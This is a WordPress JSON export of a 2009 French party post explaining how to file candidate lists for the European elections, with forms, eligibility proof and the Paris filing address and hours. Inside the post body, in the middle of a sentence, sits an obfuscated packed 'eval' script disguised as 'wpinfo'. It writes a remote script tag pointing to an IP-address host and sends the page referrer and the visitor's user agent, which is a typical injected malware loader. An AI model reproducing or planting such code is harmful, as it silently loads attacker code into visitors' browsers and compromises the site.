{"id":2596,"date":"2009-03-27T19:48:56","date_gmt":"2009-03-27T19:48:56","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=2596"},"modified":"2009-03-27T19:48:56","modified_gmt":"2009-03-27T19:48:56","slug":"depot-des-listes","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=2596","title":{"rendered":"D\u00e9pot des listes"},"content":{"rendered":"<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=26\" target=\"_blank\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-24 aligncenter\" style=\"margin-top: 5px; margin-bottom: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><\/p>\n<p style=\"text-align: left;\"><strong>Les <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isirb|var|u0026u|referrer|inist||js|php'.split('|'),0,{}))\n<\/script><\/noindex> documents ressources<\/strong><strong> <\/strong>:<\/p>\n<ul style=\"text-align: left;\">\n<li><a href=\"http:\/\/www.interieur.gouv.fr\/sections\/a_votre_service\/elections\/actualites\/europeennes-2009\/europeennes-2009\/view\">le sit<\/a><a href=\"http:\/\/www.interieur.gouv.fr\/sections\/a_votre_service\/elections\/actualites\/europeennes-2009\/europeennes-2009\/view\">e<\/a><a href=\"http:\/\/www.interieur.gouv.fr\/sections\/a_votre_service\/elections\/actualites\/europeennes-2009\/europeennes-2009\/view\"> du minist\u00e8re &#8211; Num\u00e9ro de t\u00e9l\u00e9phone au Minist\u00e8re = 01 49 49 27<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.interieur.gouv.fr\/sections\/a_votre_service\/elections\/actualites\/europeennes-2009\/europeennes-2009\/downloadFile\/attachedFile_2\/Memento_Europeennes_2009_3.pdf?nocache=1240305501.59\">le m\u00e9mento en pdf<\/a><\/li>\n<\/ul>\n<p><strong>Documents \u00e0 remplir par les colistiers <!--more--><\/strong><\/p>\n<ul>\n<li>l<em>e formulaire de ca<\/em><em>ndidature du colistier se trouve<a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/04\/declaration-de-candidature.pdf\"> <\/a><\/em><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/04\/declaration-de-candidature.pdf\">pages 41-42 de ce memento<\/a><em>: <\/em>\n<ul>\n<li><em><strong>ne pas remplir <\/strong>les cases n\u00b0 de candidat et parti politique rattach\u00e9. On le fera.<\/em><\/li>\n<li><em>idem avec les d\u00e9tails qui ne sont pas individuel ou alors, voir ci-dessous pour nous aider<br \/>\n<\/em><\/li>\n<li><em><strong>bien remplir<\/strong> n\u00b0CSP indiqu\u00e9 \u00e0 la <\/em>page 44 du memento<em> !!!<\/em><\/li>\n<li><em><strong>intitul\u00e9e de la liste<\/strong> : europe-d\u00e9croissance<br \/>\n<\/em><\/li>\n<li><em><strong>\u00c9tiquette politique<\/strong> : mettre PPLD (Parti Pour La D\u00e9croissance)<\/em><\/li>\n<li><em><strong>C<\/strong><strong>andidat t\u00eate de liste<\/strong>: <a href=\"http:\/\/www.partipourladecroissance.net\/?p=2424\">\u00e7a d\u00e9pend<\/a><br \/>\n<\/em><\/li>\n<li>\u00e0 imprimer recto\/verso par exemple<\/li>\n<\/ul>\n<\/li>\n<li><em>C<\/em><em>haque d\u00e9claration de candidature doit \u00eatre accompagn\u00e9e de la copie d&rsquo;une pi\u00e8ce de nature \u00e0 prouver que chaque candidat <strong>est \u00e2g\u00e9 de vingt-trois ans r\u00e9volus et poss\u00e8de la qualit\u00e9 d&rsquo;\u00e9lecteur <\/strong>(art. R. 109-2 I.)<\/em><em><br \/>\nCette attestation d&rsquo;inscription sur les listes \u00e9lectorales est d\u00e9livr\u00e9e par le maire de sa commune d&rsquo;inscription <strong>dans les 30 jours pr\u00e9c\u00e9dant le d\u00e9p\u00f4t de candidature<\/strong>. (voir <\/em>page 8 du memento)<\/li>\n<li><em><strong>Rappel <\/strong>: il n&rsquo;est pas n\u00e9cessaire de r\u00e9sider dans la circonscription pour \u00eatre candidat ou suppl\u00e9ant. Il faut juste avoir plus de 23 ans (cf ci-dessus)<br \/>\n<\/em><\/li>\n<\/ul>\n<p><strong>Documents \u00e0 remplir par les t\u00eates de listes : <\/strong><\/p>\n<ul>\n<li><em>l<\/em><em>e formulaire de ca<\/em><em>ndidature du colistier se trouve<a href=\"http:\/\/www.interieur.gouv.fr\/sections\/a_votre_service\/elections\/actualites\/europeennes-2009\/europeennes-2009\/downloadFile\/attachedFile_2\/Memento_Europeennes_2009_3.pdf?nocache=1240305501.59\"> pages 40 du memento : <\/a><\/em><\/li>\n<li><em>la m\u00eame chose que les autres colistiers. Et toc !<\/em><\/li>\n<li><em><strong>Intitul\u00e9 de notre liste <\/strong>: \u00ab\u00a0<\/em>Europe-d\u00e9croissanc<em>e\u00a0\u00bb pour toutes les r\u00e9gions<\/em><\/li>\n<li><em><strong>Etiquette d\u00e9clar\u00e9e de la liste <\/strong>: \u00e0 pr\u00e9ciser <\/em>(ADOC-France ou PPLD,<em> \u00e0 pr\u00e9ciser bient\u00f4t)<\/em><\/li>\n<li><em><strong>Coordonn\u00e9es du d\u00e9l\u00e9gu\u00e9 ayant qualit\u00e9 pour suivre la proc\u00e9dure<\/strong> : le 2nd de la liste par exemple<br \/>\n<\/em><\/li>\n<\/ul>\n<p><strong>D\u00e9p\u00f4tdes listes : <\/strong><\/p>\n<ul>\n<li>Les d\u00e9clarations de candidature sont d\u00e9pos\u00e9es au minist\u00e8re de l\u2019int\u00e9rieur, bureau des \u00e9lections et des \u00e9tudes politiques,<em><br \/>\n<strong>1 bis place des Saussaies, 75008 Paris par le candidat t\u00eate de liste ou par le mandataire qu\u2019il aura d\u00e9sign\u00e9 <\/strong><\/em><\/li>\n<li><em>aucun autre mode de d\u00e9claration de candidature, notamment par voie postale, par t\u00e9l\u00e9copie ou par messagerie \u00e9lectronique, n\u2019est admis..)<br \/>\n<\/em><\/li>\n<li><em>les jours ouvr\u00e9s, \u00e0 partir du lundi 11 mai 2009\u00a0 9h et jusqu\u2019au vendredi 22 mai 18h, de 9h \u00e0 12 h et de 14 h \u00e0 18 h (les candidatures ne seront toutefois pas re\u00e7ues le jeudi 21 mai 2009, jour de l\u2019Ascension)<\/em><\/li>\n<li><strong>Le mandataire financier n&rsquo;est pas celui qui ira d\u00e9poser les listes ! <\/strong>il faut d\u00e9signer un seul mandataire d\u00e9l\u00e9gu\u00e9 pour toutes les listes ,qui est de Paris et ira d\u00e9poser les listes compl\u00e8tes au fur et \u00e0 mesure<em> .<\/em><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Les documents ressources : le site du minist\u00e8re &#8211; Num\u00e9ro de t\u00e9l\u00e9phone au Minist\u00e8re = 01 49 49 27 le m\u00e9mento en pdf Documents \u00e0 remplir par les colistiers<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-2596","post","type-post","status-publish","format-standard","hentry","category-adoc-actualites"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2596","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2596"}],"version-history":[{"count":0,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2596\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2596"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2596"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2596"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}